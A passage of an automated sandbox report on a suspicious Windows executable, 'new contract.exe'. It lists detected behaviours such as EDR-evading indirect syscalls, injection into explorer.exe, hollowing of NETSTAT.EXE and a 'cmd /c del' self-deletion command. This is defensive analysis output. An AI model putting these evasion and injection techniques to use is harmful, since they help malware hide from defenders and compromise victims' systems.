Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01628BF0 mov eax, dword ptr fs:[00000030h] 2_2_01628BF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164EBFC mov eax, dword ptr fs:[00000030h] 2_2_0164EBFC
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016ACBF0 mov eax, dword ptr fs:[00000030h] 2_2_016ACBF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01640BCB mov eax, dword ptr fs:[00000030h] 2_2_01640BCB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01640BCB mov eax, dword ptr fs:[00000030h] 2_2_01640BCB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01640BCB mov eax, dword ptr fs:[00000030h] 2_2_01640BCB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620BCD mov eax, dword ptr fs:[00000030h] 2_2_01620BCD
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620BCD mov eax, dword ptr fs:[00000030h] 2_2_01620BCD
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620BCD mov eax, dword ptr fs:[00000030h] 2_2_01620BCD
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CEBD0 mov eax, dword ptr fs:[00000030h] 2_2_016CEBD0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630BBE mov eax, dword ptr fs:[00000030h] 2_2_01630BBE
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630BBE mov eax, dword ptr fs:[00000030h] 2_2_01630BBE
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D4BB0 mov eax, dword ptr fs:[00000030h] 2_2_016D4BB0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D4BB0 mov eax, dword ptr fs:[00000030h] 2_2_016D4BB0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165CA6F mov eax, dword ptr fs:[00000030h] 2_2_0165CA6F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165CA6F mov eax, dword ptr fs:[00000030h] 2_2_0165CA6F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165CA6F mov eax, dword ptr fs:[00000030h] 2_2_0165CA6F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CEA60 mov eax, dword ptr fs:[00000030h] 2_2_016CEA60
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169CA72 mov eax, dword ptr fs:[00000030h] 2_2_0169CA72
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169CA72 mov eax, dword ptr fs:[00000030h] 2_2_0169CA72
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h] 2_2_01626A50
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h] 2_2_01626A50
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h] 2_2_01626A50
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h] 2_2_01626A50
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h] 2_2_01626A50
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h] 2_2_01626A50
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h] 2_2_01626A50
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630A5B mov eax, dword ptr fs:[00000030h] 2_2_01630A5B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630A5B mov eax, dword ptr fs:[00000030h] 2_2_01630A5B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165CA24 mov eax, dword ptr fs:[00000030h] 2_2_0165CA24
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164EA2E mov eax, dword ptr fs:[00000030h] 2_2_0164EA2E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01644A35 mov eax, dword ptr fs:[00000030h] 2_2_01644A35
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01644A35 mov eax, dword ptr fs:[00000030h] 2_2_01644A35
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016ACA11 mov eax, dword ptr fs:[00000030h] 2_2_016ACA11
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165AAEE mov eax, dword ptr fs:[00000030h] 2_2_0165AAEE
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165AAEE mov eax, dword ptr fs:[00000030h] 2_2_0165AAEE
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01676ACC mov eax, dword ptr fs:[00000030h] 2_2_01676ACC
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01676ACC mov eax, dword ptr fs:[00000030h] 2_2_01676ACC
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01676ACC mov eax, dword ptr fs:[00000030h] 2_2_01676ACC
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620AD0 mov eax, dword ptr fs:[00000030h] 2_2_01620AD0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01654AD0 mov eax, dword ptr fs:[00000030h] 2_2_01654AD0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01654AD0 mov eax, dword ptr fs:[00000030h] 2_2_01654AD0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01628AA0 mov eax, dword ptr fs:[00000030h] 2_2_01628AA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01628AA0 mov eax, dword ptr fs:[00000030h] 2_2_01628AA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01676AA4 mov eax, dword ptr fs:[00000030h] 2_2_01676AA4
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162EA80 mov eax, dword ptr fs:[00000030h] 2_2_0162EA80
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162EA80 mov eax, dword ptr fs:[00000030h] 2_2_0162EA80
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00682167 GetProcessHeap,htons,htons,InternalGetTcpTableWithOwnerModule,htons,htons,InternalGetTcpTable2,htons,htons,HeapFree,InternalGetBoundTcpEndpointTable,htons,htons,HeapFree,htons,htons,InternalGetTcp6TableWithOwnerModule,htons,htons,InternalGetTcp6Table2,htons,htons,HeapFree,InternalGetBoundTcp6EndpointTable,htons,htons,HeapFree,InternalGetUdpTableWithOwnerModule,htons,HeapFree,InternalGetUdp6TableWithOwnerModule,htons,HeapFree, 5_2_00682167
Enables debug privileges
Source: C:\Users\user\Desktop\new contract.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00685DC0 SetUnhandledExceptionFilter, 5_2_00685DC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00685C30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00685C30
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Desktop\new contract.exe NtQueueApcThread: Indirect: 0x117A4F2 Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe NtClose: Indirect: 0x117A56C
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\new contract.exe Memory written: C:\Users\user\Desktop\new contract.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\new contract.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\new contract.exe Thread register set: target process: 2580 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 2580 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\new contract.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\new contract.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 680000 Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: memset,OpenProcess,K32GetModuleBaseNameW,CompareStringW,CompareStringW,GetSystemDirectoryW,LoadLibraryExW,GetProcAddress,K32GetModuleBaseNameW,CloseHandle,LocalFree,FreeLibrary, svchost.exe 5_2_006838D2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\new contract.exe Process created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe" Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new contract.exe" Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_006858B6 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 5_2_006858B6
Source: explorer.exe, 00000003.00000000.1745096473.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.1743468048.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Users\user\Desktop\new contract.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
